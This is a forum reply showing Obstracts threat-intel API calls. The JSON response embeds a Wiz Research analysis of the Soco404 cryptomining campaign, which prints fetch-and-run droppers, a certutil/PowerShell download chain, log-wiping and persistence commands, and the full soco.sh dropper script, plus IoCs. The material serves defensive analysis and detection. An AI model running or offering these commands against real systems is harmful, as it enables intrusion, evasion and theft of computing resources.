Before I upgrade my account to use the API I want to understand if the following use-case is possible:
Hey @dtp1900 !
This is a very common use-case, the answer is; yes!
Out of interest; what TIP do you use?
Here’s the general logic (I’ll use the directory /sys as a basic example)
You will know the IoC value, but you first need to identify the ID.
curl -X 'GET' \
'https://api.obstracts.com/v1/objects/scos/?page=1&types=directory&value=%2Fsys' \
-H 'accept: application/json' \
-H 'API-KEY: HIDDEN'
{
"page_size": 50,
"page_number": 1,
"page_results_count": 49,
"total_results_count": 49,
"objects": [
{
"id": "directory--33bec98a-1619-5e60-8802-474148016c81",
"path": "/opt/sys/bin/aaaaa",
"spec_version": "2.1",
"type": "directory"
},
{
"id": "directory--006bfd99-c377-5717-9168-45787a7b455a",
"path": "/sys",
"spec_version": "2.1",
"type": "directory"
},
You can now parse out the ID of the object you want (directory--006bfd99-c377-5717-9168-45787a7b455a)
You can now filter the Report objects (SDOs) that represent posts linked to that IoC.
curl -X 'GET' \
'https://api.obstracts.com/v1/objects/directory--006bfd99-c377-5717-9168-45787a7b455a/bundle/?types=report' \
-H 'accept: application/json' \
-H 'API-KEY: HIDDEN'
{
"page_size": 50,
"page_number": 1,
"page_results_count": 3,
"total_results_count": 3,
"objects": [
{
"confidence": 0,
"created": "2025-07-23T12:00:00.000Z",
"created_by_ref": "identity--fffc6bd1-39d5-5880-bc08-09fac3aa910f",
"description": "[comment]:<> (===START_PAGE 1===)\n### \n\n**TL;DR**\n\n* Wiz research has observed an active campaign exploiting various vulnerabilities and misconfigurations across cloud environments to deploy cryptominers.* In the variant described in the blog, the attacker exploited misconfigurations in PostgresSQL.* The attacker targets both\n **Linux**\n and\n **Windows**\n systems, deploying platform-specific malware.* They use process masquerading to disguise malicious activity as legitimate system processes.* They achieve persistence via cron job and shell initialization files (e.g.,\n `.bashrc`\n ,\n `.profile`\n ).* They rely on compromised legitimate servers to host and deliver malware.* The malware spawns multiple child processes that communicate via local sockets.* Payloads are embedded in fake 404 HTML pages hosted on websites built using\n [Google Sites](https://sites.google.com/)\n . **Note:We reported these sites to Google, and they have since been taken down**\n .* We estimate that this campaign is part of a broader crypto-scam infrastructure.\nWiz Research has identified a new iteration of a broader malicious cryptomining campaign, which we’ve dubbed\n**Soco404**\n(based on the observed payload name, associated domain, and use of fake error pages).While previous activity tied to this campaign has been documented by Aqua and Imperva as targeting exposed\n[Apache Tomcat](https://www.aquasec.com/blog/new-campaign-against-apache-tomcat/)\nservices with weak credentials , as well as vulnerable\n[Apache Struts and Atlassian Confluence](https://www.imperva.com/blog/new-sysrv-botnet-variant-makes-use-of-google-subdomain-to-spread-xmrig-miner/)\nservers, our investigation uncovered a distinct case in which the attacker also targets exposed PostgreSQL instances and leverages compromised Apache Tomcat servers to host payloads tailored for both Linux and Windows environments.We also found evidence that the attacker is maintaining a broader crypto-scam infrastructure, further suggesting this is part of a long-term, versatile, and opportunistic operation.\nThe threat actor behind\n**Soco404**\nhas leveraged multiple types of infrastructure, which we have grouped into three distinct clusters:\n1.**Fake 404 Domains**\n - Registered domains that display fake 404 error pages while embedding malicious payloads directly within the HTML content.2.**Crypto-Scam Websites**\n - Domains used to host fraudulent cryptocurrency trading platforms, likely as part of a broader social engineering effort.3.**Compromised Infrastructure**\n - Legitimate servers compromised via vulnerable Apache Tomcat instances, used to host and distribute malware payloads.Notably, the attacker has successfully compromised a legitimate Korean transportation website, demonstrating their ability to abuse trusted infrastructure for malicious purposes.\nAs mentioned in our previous\n[blog post on PostgreSQL cryptojacking,](https://www.wiz.io/blog/postgresql-cryptomining)\nour data shows that nearly 90% of cloud environments self-host PostgreSQL instances, and one-third of those have at least one instance publicly exposed to the internet.These exposed PostgreSQL servers are frequently targeted by threat actors, making them a high-risk attack surface.\nIn this writeup, we detail the Soco404 campaign, share IoCs, and provide insight into its ongoing activity.Based on the dynamic number of workers linked to the attacker’s crypto wallet within the mining pool, the campaign appears to still be active.\n\n**Technical Analysis**\n\n### \n\n**PostgreSQL Exploitation**\n\nThreat actors are actively scanning for accessible services [\n[T1110.003](https://attack.mitre.org/techniques/T1110/003/)\n] that allow unauthenticated or low-effort entry points, with PostgreSQL frequently appearing in attack flows due to its prevalence and default configurations.Upon gaining access, attackers abuse PostgreSQL’s\n`COPY...FROM PROGRAM`\nfunctionality to achieve remote code execution [\n[T1190](https://attack.mitre.org/techniques/T1190/)\n], enabling them to retrieve and execute malicious payloads directly on the host [\n[T1059.004](https://attack.mitre.org/techniques/T1059/004/)\n].\nThe attacker behind\n**Soco404**\nappears to be conducting automated scans for exposed services, aiming to exploit any accessible entry point.Their use of a wide range of ingress tools, including Linux utilities like\n`wget`\nand\n`curl`\n, as well as Windows-native tools such as\n`certutil`\nand\n`PowerShell`\n, highlights an opportunistic strategy.Rather than relying on a single method or operating system, the attacker casts a wide net, deploying whichever tool or technique is available in the environment to deliver their payload.This flexible approach is characteristic of a broad, automated cryptomining campaign focused on maximizing reach and persistence across varied targets.\nIn the following sections we will detail both Linux and Windows payloads.\n### \n\nLinux payload\n\nUpon successful exploitation the attacker runs the soco.sh script directly in memory, avoiding disk writes.\n```\nsh -c \"(curl http://<compromised-service>:8080/soco.sh||wget -q -O- http://<compromised-service>:8080/soco.sh||cc http://<compromised-service>:8080/soco.sh||ww -q -O- http://<compromised-service>:8080/soco.sh)|bash\"\n```\n\n### \n\n**soco.sh**\n\n`soco.sh`\nis a dropper script that is in charge of setting the ground for the main payload.Key points:\n1.Download & execute payload from\n`http://<compromised-service>:8080/app2`\n\n[\n[T1105](https://attack.mitre.org/techniques/T1105/)\n].The script generates a random filename based on the timestamp and drops it into a writable directory on disk, explicitly avoiding\n`/tmp`\nand\n`/sys`\n, likely for persistence or evasion purposes.Next, the script will run the sleep command for 2 seconds and then delete the binary from disk to minimize its footprint [\n[T1070.004](https://attack.mitre.org/techniques/T1070/004/)\n].The server hosting the payload is a compromised [\n[T1584.004](https://attack.mitre.org/techniques/T1584/004/)\n], publicly accessible Apache Tomcat instance.Based on Aqua’s findings, it is likely that the attacker gained access via weak credentials, though exploitation of the\n[CVE-2025-24813](https://nvd.nist.gov/vuln/detail/CVE-2025-24813)\nvulnerability [\n[T1190](https://attack.mitre.org/techniques/T1190/)\n] is also a possible entry vector given the versions in use.\nIn the following section, we detail the behavior of the downloaded payload.\n2.Eliminate potential competing miners by clearing\n`/etc/ld.so.preload`\n, remove suspicious cron jobs, and forcefully killing processes with separate mount namespaces.\n```\nchattr -ia/etc/ld.so.preload\ncat/dev/null >/etc/ld.so.preload\n\n\ncrontab -l | sed '/\\.bashgo\\|pastebin\\|onion\\|bprofr\\|python\\|curl\\|wget\\|\\.sh/d' | crontab -\n\ncat/proc/mounts | awk '{print $2}' | grep -P '/proc/\\d+' | grep -Po '\\d+' | xargs -I % kill -9 %\n```\n\n3.Remove evidence of execution and reduce forensic visibility by overwriting logs including cron and wtmp [\n[T1070.002](https://attack.mitre.org/techniques/T1070/002/)\n]:\n```\necho 0>/var/spool/mail/root\necho 0>/var/log/wtmp\necho 0>/var/log/secure\necho 0>/var/log/cron\n```\n\n4.If the script is running as root, it will attempt to optimize memory performance and Maximize CPU efficiency for cryptomining.\\*See full\n`soco.sh`\nscript in Archive section below.\n### \n\n**Malware execution flow**\n\nThe binary\n`app2`\n(\n`14bf32e780601c6870811982648cf293`\n) is a UPX [\n[T1027.002](https://attack.mitre.org/techniques/T1027/002/)\n] packed Go binary obfuscated [\n[T1027](https://attack.mitre.org/techniques/T1027/)\n] using\n[Garble](https://github.com/burrowers/garble)\nto hinder analysis.Its primary function is to act as a loader for the main payload.\nUpon execution, the malware unpacks itself into memory and spawns multiple child processes.One of these processes is responsible for re-executing the binary under the name (\n`sd-pam`\n), in an attempt to masquerade [\n[T1036.005](https://attack.mitre.org/techniques/T1036/005/)\n] as the legitimate systemd user service that handles\n[PAM (Pluggable Authentication Modules)](https://linux.die.net/man/8/pam)\nsessions on Linux systems.\nAfter this, it reaches out to the command-and-control (C2) server at\n`https://www.fastsoco.top`\n, which hosts the main payload at\n`https://www.fastsoco.top/1`.\nThis website is based on\n[Google Sites](https://sites.google.com/)\n(\n`https://sites.google.com/view/2025soco/`\n), which, when accessed, displays a fake 404 error page [\n[T1583.006](https://attack.mitre.org/techniques/T1583/006/)\n].The actual binary is embedded within the HTML content [\n[T1027.006](https://attack.mitre.org/techniques/T1027/006/)\n] as a base64-encoded blob, which is extracted by searching for content between the markers\n`exe101`\nand\n`exe101`.\nFake 404 error page htttps://www.fastsoco.top/1\n\n\n\n\nSame visual appearance (404 error), different HTML content\n\n\n\n\nBase64 encoded binary embedded within HTML source\n\nThe main payload is executed with the names\n`[cpuhp/1]`\nand\n`[kworker/R-rcu_p]`\nto masquerade as kernel related processes [\n[T1036.005](https://attack.mitre.org/techniques/T1036/005/)\n].\nIt establishes the following persistence:\n**1.Crontab**\n\nA new cron job is added to run the malware every minute [\n[T1053.003](https://attack.mitre.org/techniques/T1053/003/)\n]:\n```/bin/bash -c \"(crontab -l 2>/dev/null; echo\\\"*/1 * * * */etc/postgresql/<random-binary-name>\\\") | crontab -\"\n```\n\n**2.Shell initialization files**\n\nThe following command is appended to\n`/etc/profile`\n,\n`.bashrc`\n, and\n`.profile`\n[\n[T1546.004](https://attack.mitre.org/techniques/T1546/004/)\n]:\n```\necho My>/dev/null 2>&1 &<chosen-payload-directory>/<random-binary-name> >/dev/null 2>&1 &\n```\n\nDuring execution, the malware creates multiple forked processes and drops additional copies of itself to disk using randomly generated filenames.These processes interact with each other via local socket communication [\n[T1559](https://attack.mitre.org/techniques/T1559/)\n], likely to coordinate functionality or monitor each other for resilience.\nOnce established, it begins cryptocurrency mining [\n[T1496](https://attack.mitre.org/techniques/T1496/)\n] by connecting to the pools\n`c3pool`\nand\n`moneroocean`\n, using the following wallet address:\n```\n8BmVXbfsnRsiyPfUxsfnyyA9LqXvUsF2DYBX3wUmCEtejnBMyTiXe3XDCvq4REjmviEc5J1gomsnv7e4wYy1c5Pz3VadeyZ\n```\n\n### \n\nWindows payload\n\nThe Windows initial post exploitation command is designed to download and execute a Windows binary (\n`ok.exe`\n) from the compromised server using multiple fallback methods to maximize the chances of successful execution.It begins by invoking\n`certutil`\n, a legitimate Windows utility originally intended for managing certificates, which also includes functionality for downloading files from URLs.Attackers frequently abuse\n`certutil`\nbecause it is built-in, commonly allowed by endpoint defenses, and can fetch and save remote payloads without raising immediate suspicion.If certutil fails or is blocked, the command falls back to using PowerShell’s\n`Invoke-WebRequest`\n, and finally to\n`curl`\n[\n[T1105](https://attack.mitre.org/techniques/T1105/)\n], each attempting to download the file to\n`C:\\Users\\Public\\`\ndirectory, a universally writable path, and execute it.\n```\nsh -c \" cmd/c\\\"certutil -urlcache -split -f\\\"http://<compromised-service>:8080/ok.exe\\\"\\\"C:\\Users\\Public\\os.exe\\\" &&\\\"C:\\Users\\Public\\os.exe\\\" || powershell -c\\\"iwr 'http://<compromised-service>:8080/ok.exe' -OutFile 'C:\\Users\\Public\\os.exe'; Start-Process 'C:\\Users\\Public\\os.exe'\\\" || curl -o\\\"C:\\Users\\Public\\os.exe\\\"\\\"http://<compromised-service>:8080/ok.exe\\\" &&\\\"C:\\Users\\Public\\os.exe\\\"\\\"\"\n```\n\nThe\n`ok.exe`\nbinary functions as a loader that embeds both the main payload and the WinRing0.sys driver.Upon execution, it copies itself to\n`C:\\ProgramData\\fuekghfebdot\\hunyknsmqtgn.exe or C:\\ProgramData\\blbsihkzkqxm\\wytourcabiik.exe`\nand establishes persistence by creating a service [\n[T1543.003](https://attack.mitre.org/techniques/T1543/003/)\n] with a random 8-character uppercase alphabetical name:\n```\nsc.exe create \"XXXXXXXX\" binpath= \"C:\\ProgramData\\blbsihkzkqxm\\wytourcabiik.exe\" start= \"auto\"\n```\n\nIt then attempts to cover its tracks by stopping the Windows event log service [\n[T1562.002](https://attack.mitre.org/techniques/T1562/002/)\n]:\nTo remove evidence of the original binary, the malware executes a self-deletion command [\n[T1027.002](https://attack.mitre.org/techniques/T1027/)\n].It uses the\n`choice`\ncommand to introduce a 3-second delay before deleting the file.\n```\ncmd.exe/c choice/C Y/N/D Y/T 3 & Del \"C:\\Users\\Public\\os.exe\"\n```\n\nAfterward, it spawns a\n`conhost.exe`\nprocess and injects the main payload into it, [\n[T1055](https://attack.mitre.org/techniques/T1055/)\n], creating multiple threads that communicate via TCP sockets [\n[T1559](https://attack.mitre.org/techniques/T1559/)\n].It also drops the\n`WinRing0.sys`\ndriver with a random name to the temp directory.`WinRing0.sys`\nis a component commonly used by cryptominers like XMRig to gain low-level access to system resources and improve performance.\nThe malware ultimately begins mining cryptocurrency [\n[T1496](https://attack.mitre.org/techniques/T1496/)\n] using the same wallet that was used by the Linux payload.\nXMRig miner configuration file extracts from conhost.exe memory\n\n### \n\n**Possible connection to crypto scam campaign**\n\nDuring our analysis, we identified that one of the attacker’s payloads was hosted on a\nfake cryptocurrency exchange website,\n`seeyoume.top`\n, which claimed affiliation with the\n[Hong Kong Stock Exchange (HKEX)](https://www.hkex.com.hk/?sc_lang=en).When accessing\n`seeyoume.top/sol`\n, we received a fake 404 error page that embedded the same shell script seen in the previously documented instances of the campaign.\nFurther investigation into the domain led us to a\n[Russian scam alert website](https://scam.moscow/seeyoume/)\n, which linked\n`seeyoume.top`\nto a broader crypto-scam operation and detailed the scam’s workflow.The alert also referenced additional domains associated with the scam;\n\n`diamondcapitalcrypro.com`\nwas still live and hosted nearly identical fake crypto exchange website, reinforcing the likelihood of a coordinated scam infrastructure.\nseeyoume.top\n\n\n\n\nseeyoume.top\n\n\n\n\nseeyoume.top/sol\n\nHow can Wiz help?\n\n**Prevention:**\n\nThe Wiz Dynamic Scanner detects publicly exposed PostgreSQL services configured with weak or default credentials within customers' cloud environments.The Wiz agentless workload scanner detects containers and VMs hosting PostgreSQL and identifies if they contain sensitive data or have access to highly privileged service accounts (which could just as easily be abused by opportunistic attackers for purposes other than cryptojacking).\n\n**Detection:**\n\nThe\n[Wiz Runtime Sensor](https://www.wiz.io/lp/wiz-runtime-sensor)\ndetects events and behaviors associated with this threat and similar ones, alerting you as the adversary progresses through the attack kill chain:from the exploit to the initial payload delivery, persistence creations and ultimately to the final cryptomining activity.\nBelow is an example of the initial access vector identified by the detection 'Anomalous shell execution by a database process':\n\n\n\n\nArchive\n\n`soco.sh`\nscript:\n```\n#!/bin/bash\ncc=http://<compromised-server>:8080/app2\nsys=$(date|md5sum|awk -v n=\"$(date +%s)\" '{print substr($1,1,n%7+6)}')\nget() {\n curl -k $1>$2 || cc -k $1>$2 || wget --no-check-certificate -q -O- $1>$2 || curl $1>$2 || curl $1>$2 || ww -q -O- $1>$2\n chmod +x $2\n}\n\n\nchattr -ia/etc/ld.so.preload\ncat/dev/null >/etc/ld.so.preload\n\n\ncrontab -l | sed '/\\.bashgo\\|pastebin\\|onion\\|bprofr\\|python\\|curl\\|wget\\|\\.sh/d' | crontab -\ncat/proc/mounts | awk '{print $2}' | grep -P '/proc/\\d+' | grep -Po '\\d+' | xargs -I % kill -9 %\n\n\nif [ `whoami` = \"root\" ];then\n yy\n tt\nelse\n echo \"error root!\"\nfi\n\nreadDir() {\n local u=$(whoami)\n local dir=$(find/home/root/opt/usr/var/etc -type d -user \"$u\" -writable -perm -u=wx\\ -not -path '/sys/*' -not -path '/tmp/*' -print -quit 2>/dev/null)\n \n [[ -n \"$dir\" ]] && echo \"$dir\" || echo \"/var/tmp\"\n}\n\ndirs=$(readDir)\necho \"file ok:$dirs\"\ncd -- \"$dirs\" || exit 1\nPATH=\".:$PATH\"\nget $cc $sys\n$sys\nsleep 2\nrm -rf $sys\n\necho 0>/var/spool/mail/root\necho 0>/var/log/wtmp\necho 0>/var/log/secure\necho 0>/var/log/cron\nfunction yy() {\n sysctl -w vm.nr_hugepages=$(nproc)\n\n for i in $(find/sys/devices/system/node/node* -maxdepth 0 -type d);\n do\n echo 3 > \"$i/hugepages/hugepages-1048576kB/nr_hugepages\";\n done\n\n echo \"1GB pages successfully enabled\"\n}\nfunction tt() {\n\n MSR_FILE=/sys/module/msr/parameters/allow_writes\n\n if test -e \"$MSR_FILE\"; then\n echo on > $MSR_FILE\n else\n modprobe msr allow_writes=on\n fi\n\nif grep -E 'AMD Ryzen|AMD EPYC'/proc/cpuinfo >/dev/null;\n then\n if grep \"cpu family[[:space:]]\\{1,\\}:[[:space:]]25\"/proc/cpuinfo >/dev/null;\n then\n if grep \"model[[:space:]]\\{1,\\}:[[:space:]]97\"/proc/cpuinfo >/dev/null;\n then\n echo \"Detected Zen4 CPU\"\n wrmsr -a 0xc0011020 0x4400000000000\n wrmsr -a 0xc0011021 0x4000000000040\n wrmsr -a 0xc0011022 0x8680000401570000\n wrmsr -a 0xc001102b 0x2040cc10\n echo \"MSR register values for Zen4 applied\"\n else\n echo \"Detected Zen3 CPU\"\n wrmsr -a 0xc0011020 0x4480000000000\n wrmsr -a 0xc0011021 0x1c000200000040\n wrmsr -a 0xc0011022 0xc000000401500000\n wrmsr -a 0xc001102b 0x2000cc14\n echo \"MSR register values for Zen3 applied\"\n fi\n else\n echo \"Detected Zen1/Zen2 CPU\"\n wrmsr -a 0xc0011020 0\n wrmsr -a 0xc0011021 0x40\n wrmsr -a 0xc0011022 0x1510000\n wrmsr -a 0xc001102b 0x2000cc16\n echo \"MSR register values for Zen1/Zen2 applied\"\n fi\nelif grep \"Intel\"/proc/cpuinfo >/dev/null;\n then\n echo \"Detected Intel CPU\"\n wrmsr -a 0x1a4 0xf\n echo \"MSR register values for Intel applied\"\nelse\n echo \"No supported CPU detected\"\nfi\n}\n```\n\nIOCs\n\n| Indicator | Description |\n| --- | --- |\n| c9bb137d56fab7d52b3dbc85ae754b79d861a118bfb99566faaa342c978285ff | SHA-256 soco.sh |\n| bac4b166dec1df8aa823a15136c82c8b50960b11a0c4da68b8d7dedcb0f3a794 | SHA-256 soco.sh |\n| c67e876d7b3ae5f3c4fd626d8ba62e77bd47dfdf51f7a4438edd64bd0f88ce3a | SHA-256 soco.sh |\n| 039caa15c1a54b49250717e68cd1a78a4be17b80e8062441c340eba0674e5926 | SHA-256 of ldr.sh |\n| 0ad013c5166900b9c57a7ff771dbbf8b11f8a3be46a85cff6ced83ceb1a38f8d | SHA-256 of ldr.sh |\n| 5a8e5d7dfc7ccadf8b66fa8b04cf33010f0384072fc9b1fc79e7e1a65a0c701c | SHA-256 of ldr.sh |\n| 9055bcd42263d83943358f76b13cdf24079ef9db8a2167658089be5324279485 | SHA-256 of ldr.sh |\n| a1fbaee0915edd8568fcea9868fd511adb43faf93bd0abd63788a61febcff13b | SHA-256 of ldr.sh |\n| 09e7232ef9322792f6340cc637d3ba2292383c2d353196252bd7a3cf00f4ba0e | SHA-256 of ldr.sh |\n| d62c4c621de5e6deee28454413c612cd99511aaa85f9722c1ebadc731d22cab2 | SHA-256 of ldr.sh |\n| e7fe0a5c6c198be8941d5a1be7c0669688c45751e9bf0d16a0ae6ae1d0e7a957 | SHA-256 of ELF malware |\n| e69e55027bf64011599ae1283d15d157bfefed1c03e20fe72ecf7e90fd451e76 | SHA-256 of ELF malware |\n| 424f15e2509ed62c95d5637df0b519c40f73b3cbb00b7a8073ba89ddad7e5dc1 | SHA-256 of ELF malware |\n| 22abd35b6afd1909e6d71bd75b2ac23890e2675f9d40e403b0cfd4ed155a96f6 | SHA-256 of ELF malware |\n| cbb9d5c601fca0b9b25ec914431abc35c45d5f4c2bbf18e14661aadd8e7e2f47 | SHA-256 of ELF malware |\n| 68bb9e294ba7f1b0426e16abbdb5c8f29daa8e8d98aee7a430ead97f2ffadd3a | SHA-256 of ELF malware |\n| 8739f0189f64636fab1965bb066ba67a980ecabafd4307f4fb732ffdc154fa04 | SHA-256 of ELF malware |\n| 54303aa4f7b7ae3137f5f1368dba6b9b90f7826b8b18132ea495fff29f33f1e4 | SHA-256 of ELF malware |\n| 13e3cb74ad420c0770b9fedae617eaf312272db12035e4f64ebb606ac96f6ef0 | SHA-256 of ELF malware |\n| 498ecdfce65d739154b39703c63c8f4334066655e1cc8024c2716e280598cacc | SHA-256 of ok.exe Windows malware |\n| 8d06979a38ee5ef6f03817a1d16ab75171528cfaf8f743bfe64b45abd6c26142 | SHA-256 of ok.exe Windows malware |\n| bf038c13468a9b75278ea198c3d41d4ad4fc14e447d9dd0a94915ce2ab8132e5 | SHA-256 of ok.exe Windows malware |\n| a047e82948bf7c43281c975b9588bf5d4500fd671a5e25fc3f9206cbd1827dfd | SHA-256 of ok.exe Windows malware |\n| 5b224a091151661943e038066ef03f7b5bab055187f3b1b582dbfe392e74c921 | SHA-256 of appx.exe Windows malware |\n| 0086fe6259af25f3b5a12d81080bed61938cc70ebdf480501acc1c10ac39c74a | SHA-256 of os.exe Windows malware |\n| 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5 | SHA-256 of WinRing0.sys |\n| https://sites.google.com/view/2025soco/| Payload hosting site |\n| [https://sites.google.com/view/dblikes](https://www.wiz.io/blog/soco404-multiplatform-cryptomining-campaign-uses-fake-error-pages-to-hide-payload#no-link) | Payload hosting site |\n| [https://sites.google.com/view/sogoto](https://www.wiz.io/blog/soco404-multiplatform-cryptomining-campaign-uses-fake-error-pages-to-hide-payload#no-link) | Payload hosting site |\n| [https://sites.google.com/view/osk05](https://www.wiz.io/blog/soco404-multiplatform-cryptomining-campaign-uses-fake-error-pages-to-hide-payload#no-link) | Payload hosting site |\n| www.fastsoco.top | Payload hosting site |\n| dblikes.cyou | Payload hosting site |\n| seeyoume.top | Payload hosting site |\n| arcticoins.com | Crypto scam domain |\n| diamondcapitalcrypro.com | Crypto scam domain |\n| nordicicoins.com | Crypto scam domain |\n| hkcapitals.com | Crypto scam domain |\n| auto.c3pool.org | Mining pool |\n| gulf.moneroocean.stream | Mining pool |\n| 483F2xjkCUegxPM7wAexam1Be67EqDRZpS7azk8hcGETSustmuxd1Agffa3XSHFyzeFprLyHKm37bTPShFUTKgctMSBVuuK | Attacker’s crypto wallet address |\n| 8BmVXbfsnRsiyPfUxsfnyyA9LqXvUsF2DYBX3wUmCEtejnBMyTiXe3XDCvq4REjmviEc5J1gomsnv7e4wYy1c5Pz3VadeyZ | Attacker’s crypto wallet address |\n\n**MITRE ATT&CK® Techniques used by Soco404**\n\nCommand and Control - Ingress Tool Transfer (\n[T1105](https://attack.mitre.org/techniques/T1105/)\n)\n\nCredential Access - Brute Force:Password Spraying (\n[T1110.003](https://attack.mitre.org/techniques/T1110/003/)\n)\n\nDefense Evasion - Impair Defenses:Disable Windows Event Logging (\n[T1562.002](https://attack.mitre.org/techniques/T1562/002/)\n)\n\nDefense Evasion - Indicator Removal:Clear Linux or Mac System Logs (\n[T1070.002](https://attack.mitre.org/techniques/T1070/002/)\n)\n\nDefense Evasion - Indicator Removal:File Deletion (\n[T1070.004](https://attack.mitre.org/techniques/T1070/004/)\n)\n\nDefense Evasion - Masquerading:Match Legitimate Name or Location (\n[T1036.005](https://attack.mitre.org/techniques/T1036/005/)\n)\n\nDefense Evasion - Obfuscated Files or Information (\n[T1027.002](https://attack.mitre.org/techniques/T1027/)\n)\n\nDefense Evasion - Obfuscated Files or Information:HTML Smuggling (\n[T1027.006](https://attack.mitre.org/techniques/T1027/006/)\n)\n\nDefense Evasion - Obfuscated Files or Information:Software Packing (\n[T1027.002](https://attack.mitre.org/techniques/T1027/002/)\n)\n\nDefense Evasion - Process Injection (\n[T1055](https://attack.mitre.org/techniques/T1055/)\n)\n\nExecution - Command and Scripting Interpreter:Unix Shell (\n[T1059.004](https://attack.mitre.org/techniques/T1059/004/)\n)\n\nExecution - Inter-Process Communication (\n[T1559](https://attack.mitre.org/techniques/T1559/)\n)\n\nInitial Access - Exploit Public-Facing Application (\n[T1190](https://attack.mitre.org/techniques/T1190/)\n)\n\nImpact – Resource Hijacking (\n[T1496](https://attack.mitre.org/techniques/T1496/)\n)\n\nPersistence - Create or Modify System Process:Windows Service (\n[T1543.003](https://attack.mitre.org/techniques/T1543/003/)\n)\n\nPersistence - Scheduled Task/Job:Cron (\n[T1053.003](https://attack.mitre.org/techniques/T1053/003/)\n)\n\nPersistence - Event Triggered Execution:Unix Shell Configuration Modification (\n[T1546.004](https://attack.mitre.org/techniques/T1546/004/)\n)\n\nResource Development - Acquire Infrastructure:Web Services (\n[T1583.006](https://attack.mitre.org/techniques/T1583/006/)\n)\n\nResource Development - Compromise Infrastructure:Server (\n[T1584.004](https://attack.mitre.org/techniques/T1584/004/)\n)\n\n[comment]:<> (===END_PAGE 1===)\n----------------",
"external_references": [
{
"source_name": "txt2stix_report_id",
"external_id": "1c77e79c-2d16-5200-ae0e-e43f99d06824"
},
{
"source_name": "txt2stix_report_md5",
"description": "37d6220d8f83633a4a9faa210588b59d"
},
{
"source_name": "post_link",
"url": "https://www.wiz.io/blog/soco404-multiplatform-cryptomining-campaign-uses-fake-error-pages-to-hide-payload"
},
{
"source_name": "obstracts_feed_id",
"external_id": "fffc6bd1-39d5-5880-bc08-09fac3aa910f"
},
{
"source_name": "obstracts_profile_id",
"external_id": "3d9af85e-dc3f-5ac8-951f-aa26ef74086a"
},
{
"source_name": "txt2stix_describes_incident",
"description": "true",
"external_id": "openai:gpt-5"
},
{
"source_name": "txt2stix_ai_summary",
"external_id": "openai:gpt-5",
"description": "Wiz Research documents the Soco404 cryptomining campaign abusing exposed/misconfigured PostgreSQL and compromised Apache Tomcat (with prior activity against Struts/Confluence) to deploy platform-specific miners for Linux and Windows, delivered via compromised infrastructure and Google Sites-based fake 404 pages. The report details loaders, process masquerading (e.g., sd-pam, kworker), persistence via cron, shell initialization files, and Windows services, log wiping, inter-process communications, use of WinRing0, and active mining to c3pool and MoneroOcean with a specified wallet. It provides extensive IoCs (hashes, domains, wallets, pools) and ATT&CK mappings, and links the operation to a larger crypto-scam web infrastructure."
}
],
"id": "report--1c77e79c-2d16-5200-ae0e-e43f99d06824",
"labels": [
"classification.malware",
"classification.campaign",
"classification.indicator_of_compromise",
"classification.ttp",
"classification.exploit",
"classification.cyber_crime",
"classification.threat_actor"
],
"modified": "2025-07-23T12:00:00.000Z",
"name": "Soco404: Multiplatform Cryptomining Campaign Uses Fake Error Pages to Hide Payload",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487",
"marking-definition--f92e15d9-6afc-5ae2-bb3e-85a1fd83a3b5"
],
"object_refs": [
"vulnerability--2859a28e-22b9-50c4-ad49-cd48f0d48725",
"indicator--c68942d4-b667-5ae9-90ff-70cad510c9b6",
"file--660914cc-4195-5b64-81a4-d721181cf501",
"relationship--be5257a7-01dc-5e21-85e7-ad15f2c28fb2",
"indicator--6515552e-cd7a-547b-afbc-25e3440ac454",
"file--4b486726-3247-567b-86d0-088738a3be06",
"relationship--00fdc547-e441-5abe-b426-5363e2d22b3d",
"indicator--be06baec-7350-5256-a5ec-cd8c5137371e",
"file--a472f3bf-a335-553c-aa57-3497d5ba96fe",
"relationship--f0d74d7a-7bb8-543a-a963-ea89fdfd9a0e",
"indicator--f1097c69-7445-5289-88bc-21f8ae9d2ec7",
"file--ecbc6e81-d737-56fa-9eb1-11c62b4b2be1",
"relationship--8fcf41b0-9bd0-52d9-9a63-334baccaed52",
"indicator--c23b98d8-5c67-5e13-b448-e671068525e0",
"file--2e871aba-9dd8-5665-ac5d-9cb8d3952266",
"relationship--32b70f7a-b325-5c26-b200-a0fb2456a07e",
"indicator--6ef3bea4-1b35-5e83-a003-b356d3733038",
"file--431f165a-5ae3-501f-84c8-bb40988f668c",
"relationship--6a5e075e-d452-5ac5-8e22-c67bae315ad5",
"indicator--7d0be6aa-946b-5308-b374-e43226437d2d",
"file--573e8165-69a9-56b4-95e1-144dcaf1ed55",
"relationship--fdc475c1-6772-5928-b089-bc7bea2282fa",
"indicator--3256b688-3fa6-55a9-bdd4-7cbb70968a61",
"file--00a0c3fb-9126-5a34-be52-fb3551c11045",
"relationship--728570cf-54d4-56f9-9874-b69e3dffa3b9",
"indicator--72d4ef8d-3ef4-5600-8f7f-80a5584d16ff",
"file--7d891376-d766-5db3-ab9c-bab38d1c08e0",
"relationship--89a44697-46a5-594e-9908-2838c208ae32",
"indicator--1edd1967-30a7-5fec-8546-930d8d3e357a",
"file--27181e5b-052d-5109-be94-3683dbf242a2",
"relationship--3bce1626-64f4-5fed-ad12-85d1a81ee989",
"indicator--fb3c012b-1eb9-5de5-9b9f-503d35dccbcf",
"file--f6c50967-bc19-5886-b80f-9d2408bb08db",
"relationship--513b74a1-8c27-553d-affe-c6656000f7ca",
"indicator--326e8420-3dde-55e0-8525-93a52d312eaf",
"file--ea5b6524-f9e6-52af-9213-7db682499127",
"relationship--c6913b68-32f4-5c06-a476-41e62868d493",
"indicator--1e20b21b-081e-57d2-98df-9eefe7c67294",
"file--a0d04578-5185-5601-9ff2-9854d7e2042d",
"relationship--ef8dd808-7bf0-5af6-9ab9-b042ff98a928",
"indicator--06261244-f1d7-5c27-9b34-9a736d3c6725",
"file--6e948bc6-b70b-50d7-b7f5-e586c8f88e46",
"relationship--f7546f65-2a6b-592d-8ce9-30f0e0a326c7",
"indicator--6c9edb78-8367-500f-aaa3-c963c3b5d61b",
"file--4dd86a8d-c412-5154-b5cf-a0ef39971eb2",
"relationship--c34950de-d012-54e8-b654-8950eddb80c0",
"indicator--61de77a7-0be8-5905-a2d7-92e800d624ac",
"file--99c1c8b2-2101-504a-9f97-0b20f4e06b2a",
"relationship--3546ab51-9569-52b5-aeb8-c604574de4a4",
"indicator--1ac078d4-761c-5adb-bbfd-3e4f4bfc27a5",
"file--c84ab80a-2ddc-58fc-b7ed-80b64b47e234",
"relationship--c55b9838-eb8c-5901-a1ca-4d0531422db8",
